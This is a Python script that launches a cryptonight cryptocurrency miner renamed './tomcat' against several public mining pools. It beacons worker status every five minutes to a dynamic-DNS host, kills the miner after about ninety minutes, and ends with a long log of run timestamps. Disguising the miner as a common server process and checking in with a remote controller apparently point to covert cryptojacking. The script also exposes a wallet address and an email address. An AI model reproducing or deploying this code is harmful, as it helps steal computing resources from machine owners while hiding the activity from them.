import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:47:07.406452
#2018-02-17 16:34:04.620027
#2018-02-17 18:22:02.215316
#2018-02-17 20:10:03.854133
#2018-02-17 21:57:06.509878
#2018-02-17 23:42:07.211390
#2018-02-18 01:32:06.229278
#2018-02-18 03:18:03.743366
#2018-02-18 05:06:06.584503
#2018-02-18 06:59:06.367093
#2018-02-18 08:47:04.125150
#2018-02-18 10:34:07.137570
#2018-02-18 12:19:05.038746
#2018-02-18 14:06:07.548304
#2018-02-18 15:56:04.701749
#2018-02-18 17:45:07.187161
#2018-02-18 19:32:02.201497
#2018-02-18 21:17:04.941512
#2018-02-18 23:05:07.260432
#2018-02-19 00:52:05.767104
#2018-02-19 02:39:06.708283
#2018-02-19 04:26:04.164883
#2018-02-19 06:11:05.294462
#2018-02-19 07:58:04.759789
#2018-02-19 09:49:04.236738
#2018-02-19 11:37:06.123644
#2018-02-19 13:24:01.471893
#2018-02-19 15:12:05.684710
#2018-02-19 17:02:08.010750
#2018-02-19 18:49:08.261204
#2018-02-19 20:37:07.405573
#2018-02-19 22:23:06.391063
#2018-02-20 00:08:06.530307
#2018-02-20 01:55:07.531923
#2018-02-20 03:44:07.298799
#2018-02-20 05:30:09.038947
#2018-02-20 07:14:09.077974
#2018-02-20 08:59:01.808058
#2018-02-20 10:42:08.902464
#2018-02-20 12:28:01.670584
#2018-02-20 14:14:09.187851
#2018-02-20 15:59:12.992429
#2018-02-20 17:46:10.093704
#2018-02-20 19:33:08.116074
#2018-02-20 21:21:01.994452
#2018-02-20 23:06:09.024209
#2018-02-21 00:52:04.037538
#2018-02-21 02:37:08.110736
#2018-02-21 04:25:05.738490
#2018-02-21 06:12:08.380423
#2018-02-21 07:58:04.041785
#2018-02-21 09:45:06.492990
#2018-02-21 11:35:09.053233
#2018-02-21 13:24:01.236392
#2018-02-21 15:08:09.642817
#2018-02-21 16:57:04.108758
#2018-02-21 18:47:07.975876
#2018-02-21 20:39:04.103930
#2018-02-21 22:24:04.813621
#2018-02-22 00:13:05.991780
#2018-02-22 01:59:01.830857
#2018-02-22 03:45:02.408425
#2018-02-22 05:31:06.880595
#2018-02-22 07:17:04.102585
#2018-02-22 09:04:04.984072
#2018-02-22 10:51:10.054171
#2018-02-22 12:36:11.464168
#2018-02-22 14:23:01.457984
#2018-02-22 16:11:09.669854
#2018-02-22 17:57:12.195812
#2018-02-22 19:46:08.469454
#2018-02-22 21:36:08.630400
#2018-02-22 23:23:01.975085
#2018-02-23 01:10:04.933474
#2018-02-23 02:56:07.822438
#2018-02-23 04:44:08.259839
#2018-02-23 06:31:06.680555
#2018-02-23 08:18:05.358990
#2018-02-23 10:34:05.012300
#2018-02-23 12:27:07.949405
#2018-02-23 14:14:08.003745
#2018-02-23 16:04:01.746955
#2018-02-23 17:49:07.458976
#2018-02-23 19:35:08.804568
#2018-02-23 21:18:07.943766
#2018-02-23 23:06:07.748588
#2018-02-24 00:51:06.941719
#2018-02-24 02:34:06.360522
#2018-02-24 04:27:06.695578
#2018-02-24 06:12:04.349129
#2018-02-24 07:59:04.288705
#2018-02-24 09:44:01.827772
#2018-02-24 11:40:07.894435
#2018-02-24 13:31:06.846945
#2018-02-24 15:19:01.586164
#2018-02-24 17:08:06.173630
#2018-02-24 19:00:09.821017
#2018-02-24 20:47:02.176598
#2018-02-24 23:03:04.303683
#2018-02-25 02:20:01.213202
#2018-02-25 05:37:05.019374
#2018-02-25 11:35:08.393760